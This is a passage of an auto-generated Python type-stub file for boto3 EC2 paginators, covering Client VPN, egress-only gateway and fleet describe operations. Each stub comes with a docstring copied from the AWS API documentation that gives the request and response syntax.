A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type InstanceIds: list
:param InstanceIds:
One or more instance IDs. Must be instances linked to a VPC through ClassicLink.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeClientVpnAuthorizationRules(Paginator):
def paginate(self, ClientVpnEndpointId: str, DryRun: bool = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_client_vpn_authorization_rules`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeClientVpnAuthorizationRules>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
ClientVpnEndpointId='string',
DryRun=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'AuthorizationRules': [
{
'ClientVpnEndpointId': 'string',
'Description': 'string',
'GroupId': 'string',
'AccessAll': True|False,
'DestinationCidr': 'string',
'Status': {
'Code': 'authorizing'|'active'|'failed'|'revoking',
'Message': 'string'
}
},
],
}
**Response Structure**
- *(dict) --*
- **AuthorizationRules** *(list) --*
Information about the authorization rules.
- *(dict) --*
Information about an authorization rule.
- **ClientVpnEndpointId** *(string) --*
The ID of the Client VPN endpoint with which the authorization rule is associated.
- **Description** *(string) --*
A brief description of the authorization rule.
- **GroupId** *(string) --*
The ID of the Active Directory group to which the authorization rule grants access.
- **AccessAll** *(boolean) --*
Indicates whether the authorization rule grants access to all clients.
- **DestinationCidr** *(string) --*
The IPv4 address range, in CIDR notation, of the network to which the authorization rule applies.
- **Status** *(dict) --*
The current state of the authorization rule.
- **Code** *(string) --*
The state of the authorization rule.
- **Message** *(string) --*
A message about the status of the authorization rule, if applicable.
:type ClientVpnEndpointId: string
:param ClientVpnEndpointId: **[REQUIRED]**
The ID of the Client VPN endpoint.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type Filters: list
:param Filters:
One or more filters. Filter names and values are case-sensitive.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeClientVpnConnections(Paginator):
def paginate(self, ClientVpnEndpointId: str, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_client_vpn_connections`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeClientVpnConnections>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
ClientVpnEndpointId='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Connections': [
{
'ClientVpnEndpointId': 'string',
'Timestamp': 'string',
'ConnectionId': 'string',
'Username': 'string',
'ConnectionEstablishedTime': 'string',
'IngressBytes': 'string',
'EgressBytes': 'string',
'IngressPackets': 'string',
'EgressPackets': 'string',
'ClientIp': 'string',
'CommonName': 'string',
'Status': {
'Code': 'active'|'failed-to-terminate'|'terminating'|'terminated',
'Message': 'string'
},
'ConnectionEndTime': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **Connections** *(list) --*
Information about the active and terminated client connections.
- *(dict) --*
Describes a client connection.
- **ClientVpnEndpointId** *(string) --*
The ID of the Client VPN endpoint to which the client is connected.
- **Timestamp** *(string) --*
The current date and time.
- **ConnectionId** *(string) --*
The ID of the client connection.
- **Username** *(string) --*
The username of the client who established the client connection. This information is only provided if Active Directory client authentication is used.
- **ConnectionEstablishedTime** *(string) --*
The date and time the client connection was established.
- **IngressBytes** *(string) --*
The number of bytes sent by the client.
- **EgressBytes** *(string) --*
The number of bytes received by the client.
- **IngressPackets** *(string) --*
The number of packets sent by the client.
- **EgressPackets** *(string) --*
The number of packets received by the client.
- **ClientIp** *(string) --*
The IP address of the client.
- **CommonName** *(string) --*
The common name associated with the client. This is either the name of the client certificate, or the Active Directory user name.
- **Status** *(dict) --*
The current state of the client connection.
- **Code** *(string) --*
The state of the client connection.
- **Message** *(string) --*
A message about the status of the client connection, if applicable.
- **ConnectionEndTime** *(string) --*
The date and time the client connection was terminated.
:type ClientVpnEndpointId: string
:param ClientVpnEndpointId: **[REQUIRED]**
The ID of the Client VPN endpoint.
:type Filters: list
:param Filters:
One or more filters. Filter names and values are case-sensitive.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeClientVpnEndpoints(Paginator):
def paginate(self, ClientVpnEndpointIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_client_vpn_endpoints`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeClientVpnEndpoints>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
ClientVpnEndpointIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ClientVpnEndpoints': [
{
'ClientVpnEndpointId': 'string',
'Description': 'string',
'Status': {
'Code': 'pending-associate'|'available'|'deleting'|'deleted',
'Message': 'string'
},
'CreationTime': 'string',
'DeletionTime': 'string',
'DnsName': 'string',
'ClientCidrBlock': 'string',
'DnsServers': [
'string',
],
'SplitTunnel': True|False,
'VpnProtocol': 'openvpn',
'TransportProtocol': 'tcp'|'udp',
'AssociatedTargetNetworks': [
{
'NetworkId': 'string',
'NetworkType': 'vpc'
},
],
'ServerCertificateArn': 'string',
'AuthenticationOptions': [
{
'Type': 'certificate-authentication'|'directory-service-authentication',
'ActiveDirectory': {
'DirectoryId': 'string'
},
'MutualAuthentication': {
'ClientRootCertificateChain': 'string'
}
},
],
'ConnectionLogOptions': {
'Enabled': True|False,
'CloudwatchLogGroup': 'string',
'CloudwatchLogStream': 'string'
},
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **ClientVpnEndpoints** *(list) --*
Information about the Client VPN endpoints.
- *(dict) --*
Describes a Client VPN endpoint.
- **ClientVpnEndpointId** *(string) --*
The ID of the Client VPN endpoint.
- **Description** *(string) --*
A brief description of the endpoint.
- **Status** *(dict) --*
The current state of the Client VPN endpoint.
- **Code** *(string) --*
The state of the Client VPN endpoint. Possible states include:
* ``pending-associate`` - The Client VPN endpoint has been created but no target networks have been associated. The Client VPN endpoint cannot accept connections.
* ``available`` - The Client VPN endpoint has been created and a target network has been associated. The Client VPN endpoint can accept connections.
* ``deleting`` - The Client VPN endpoint is being deleted. The Client VPN endpoint cannot accept connections.
* ``deleted`` - The Client VPN endpoint has been deleted. The Client VPN endpoint cannot accept connections.
- **Message** *(string) --*
A message about the status of the Client VPN endpoint.
- **CreationTime** *(string) --*
The date and time the Client VPN endpoint was created.
- **DeletionTime** *(string) --*
The date and time the Client VPN endpoint was deleted, if applicable.
- **DnsName** *(string) --*
The DNS name to be used by clients when connecting to the Client VPN endpoint.
- **ClientCidrBlock** *(string) --*
The IPv4 address range, in CIDR notation, from which client IP addresses are assigned.
- **DnsServers** *(list) --*
Information about the DNS servers to be used for DNS resolution.
- *(string) --*
- **SplitTunnel** *(boolean) --*
Indicates whether VPN split tunneling is supported.
- **VpnProtocol** *(string) --*
The protocol used by the VPN session.
- **TransportProtocol** *(string) --*
The transport protocol used by the Client VPN endpoint.
- **AssociatedTargetNetworks** *(list) --*
Information about the associated target networks. A target network is a subnet in a VPC.
- *(dict) --*
Describes a target network that is associated with a Client VPN endpoint. A target network is a subnet in a VPC.
- **NetworkId** *(string) --*
The ID of the subnet.
- **NetworkType** *(string) --*
The target network type.
- **ServerCertificateArn** *(string) --*
The ARN of the server certificate.
- **AuthenticationOptions** *(list) --*
Information about the authentication method used by the Client VPN endpoint.
- *(dict) --*
Describes the authentication methods used by a Client VPN endpoint. Client VPN supports Active Directory and mutual authentication. For more information, see `Authentication <https://docs.aws.amazon.com/vpn/latest/clientvpn-admin/authentication-authrization.html#client-authentication>`__ in the *AWS Client VPN Administrator Guide* .
- **Type** *(string) --*
The authentication type used.
- **ActiveDirectory** *(dict) --*
Information about the Active Directory, if applicable.
- **DirectoryId** *(string) --*
The ID of the Active Directory used for authentication.
- **MutualAuthentication** *(dict) --*
Information about the authentication certificates, if applicable.
- **ClientRootCertificateChain** *(string) --*
The ARN of the client certificate.
- **ConnectionLogOptions** *(dict) --*
Information about the client connection logging options for the Client VPN endpoint.
- **Enabled** *(boolean) --*
Indicates whether client connection logging is enabled for the Client VPN endpoint.
- **CloudwatchLogGroup** *(string) --*
The name of the Amazon CloudWatch Logs log group to which connection logging data is published.
- **CloudwatchLogStream** *(string) --*
The name of the Amazon CloudWatch Logs log stream to which connection logging data is published.
- **Tags** *(list) --*
Any tags assigned to the Client VPN endpoint.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type ClientVpnEndpointIds: list
:param ClientVpnEndpointIds:
The ID of the Client VPN endpoint.
- *(string) --*
:type Filters: list
:param Filters:
One or more filters. Filter names and values are case-sensitive.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeClientVpnRoutes(Paginator):
def paginate(self, ClientVpnEndpointId: str, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_client_vpn_routes`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeClientVpnRoutes>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
ClientVpnEndpointId='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Routes': [
{
'ClientVpnEndpointId': 'string',
'DestinationCidr': 'string',
'TargetSubnet': 'string',
'Type': 'string',
'Origin': 'string',
'Status': {
'Code': 'creating'|'active'|'failed'|'deleting',
'Message': 'string'
},
'Description': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **Routes** *(list) --*
Information about the Client VPN endpoint routes.
- *(dict) --*
Information about a Client VPN endpoint route.
- **ClientVpnEndpointId** *(string) --*
The ID of the Client VPN endpoint with which the route is associated.
- **DestinationCidr** *(string) --*
The IPv4 address range, in CIDR notation, of the route destination.
- **TargetSubnet** *(string) --*
The ID of the subnet through which traffic is routed.
- **Type** *(string) --*
The route type.
- **Origin** *(string) --*
Indicates how the route was associated with the Client VPN endpoint. ``associate`` indicates that the route was automatically added when the target network was associated with the Client VPN endpoint. ``add-route`` indicates that the route was manually added using the **CreateClientVpnRoute** action.
- **Status** *(dict) --*
The current state of the route.
- **Code** *(string) --*
The state of the Client VPN endpoint route.
- **Message** *(string) --*
A message about the status of the Client VPN endpoint route, if applicable.
- **Description** *(string) --*
A brief description of the route.
:type ClientVpnEndpointId: string
:param ClientVpnEndpointId: **[REQUIRED]**
The ID of the Client VPN endpoint.
:type Filters: list
:param Filters:
One or more filters. Filter names and values are case-sensitive.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeClientVpnTargetNetworks(Paginator):
def paginate(self, ClientVpnEndpointId: str, AssociationIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_client_vpn_target_networks`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeClientVpnTargetNetworks>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
ClientVpnEndpointId='string',
AssociationIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ClientVpnTargetNetworks': [
{
'AssociationId': 'string',
'VpcId': 'string',
'TargetNetworkId': 'string',
'ClientVpnEndpointId': 'string',
'Status': {
'Code': 'associating'|'associated'|'association-failed'|'disassociating'|'disassociated',
'Message': 'string'
},
'SecurityGroups': [
'string',
]
},
],
}
**Response Structure**
- *(dict) --*
- **ClientVpnTargetNetworks** *(list) --*
Information about the associated target networks.
- *(dict) --*
Describes a target network associated with a Client VPN endpoint.
- **AssociationId** *(string) --*
The ID of the association.
- **VpcId** *(string) --*
The ID of the VPC in which the target network (subnet) is located.
- **TargetNetworkId** *(string) --*
The ID of the subnet specified as the target network.
- **ClientVpnEndpointId** *(string) --*
The ID of the Client VPN endpoint with which the target network is associated.
- **Status** *(dict) --*
The current state of the target network association.
- **Code** *(string) --*
The state of the target network association.
- **Message** *(string) --*
A message about the status of the target network association, if applicable.
- **SecurityGroups** *(list) --*
The IDs of the security groups applied to the target network association.
- *(string) --*
:type ClientVpnEndpointId: string
:param ClientVpnEndpointId: **[REQUIRED]**
The ID of the Client VPN endpoint.
:type AssociationIds: list
:param AssociationIds:
The IDs of the target network associations.
- *(string) --*
:type Filters: list
:param Filters:
One or more filters. Filter names and values are case-sensitive.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeEgressOnlyInternetGateways(Paginator):
def paginate(self, DryRun: bool = None, EgressOnlyInternetGatewayIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_egress_only_internet_gateways`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeEgressOnlyInternetGateways>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
EgressOnlyInternetGatewayIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'EgressOnlyInternetGateways': [
{
'Attachments': [
{
'State': 'attaching'|'attached'|'detaching'|'detached',
'VpcId': 'string'
},
],
'EgressOnlyInternetGatewayId': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **EgressOnlyInternetGateways** *(list) --*
Information about the egress-only internet gateways.
- *(dict) --*
Describes an egress-only internet gateway.
- **Attachments** *(list) --*
Information about the attachment of the egress-only internet gateway.
- *(dict) --*
Describes the attachment of a VPC to an internet gateway or an egress-only internet gateway.
- **State** *(string) --*
The current state of the attachment. For an internet gateway, the state is ``available`` when attached to a VPC; otherwise, this value is not returned.
- **VpcId** *(string) --*
The ID of the VPC.
- **EgressOnlyInternetGatewayId** *(string) --*
The ID of the egress-only internet gateway.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type EgressOnlyInternetGatewayIds: list
:param EgressOnlyInternetGatewayIds:
One or more egress-only internet gateway IDs.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeFleets(Paginator):
def paginate(self, DryRun: bool = None, FleetIds: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_fleets`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeFleets>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
FleetIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Fleets': [
{
'ActivityStatus': 'error'|'pending-fulfillment'|'pending-termination'|'fulfilled',
'CreateTime': datetime(2015, 1, 1),
'FleetId': 'string',
'FleetState': 'submitted'|'active'|'deleted'|'failed'|'deleted-running'|'deleted-terminating'|'modifying',
'ClientToken': 'string',
'ExcessCapacityTerminationPolicy': 'no-termination'|'termination',
'FulfilledCapacity': 123.0,
'FulfilledOnDemandCapacity': 123.0,
'LaunchTemplateConfigs': [
{
'LaunchTemplateSpecification': {
'LaunchTemplateId': 'string',
'LaunchTemplateName': 'string',
'Version': 'string'
},
'Overrides': [
{
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'MaxPrice': 'string',
'SubnetId': 'string',
'AvailabilityZone': 'string',
'WeightedCapacity': 123.0,
'Priority': 123.0,
'Placement': {
'GroupName': 'string'
}
},
]
},
],
'TargetCapacitySpecification': {
'TotalTargetCapacity': 123,
'OnDemandTargetCapacity': 123,
'SpotTargetCapacity': 123,
'DefaultTargetCapacityType': 'spot'|'on-demand'
},
'TerminateInstancesWithExpiration': True|False,
'Type': 'request'|'maintain'|'instant',
'ValidFrom': datetime(2015, 1, 1),
'ValidUntil': datetime(2015, 1, 1),
'ReplaceUnhealthyInstances': True|False,
'SpotOptions': {
'AllocationStrategy': 'lowest-price'|'diversified',
'InstanceInterruptionBehavior': 'hibernate'|'stop'|'terminate',
'InstancePoolsToUseCount': 123,
'SingleInstanceType': True|False,
'SingleAvailabilityZone': True|False,
'MinTargetCapacity': 123
},
'OnDemandOptions': {
'AllocationStrategy': 'lowest-price'|'prioritized',
'SingleInstanceType': True|False,
'SingleAvailabilityZone': True|False,
'MinTargetCapacity': 123
},
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'Errors': [
{
'LaunchTemplateAndOverrides': {
'LaunchTemplateSpecification': {
'LaunchTemplateId': 'string',
'LaunchTemplateName': 'string',
'Version': 'string'
},
'Overrides': {
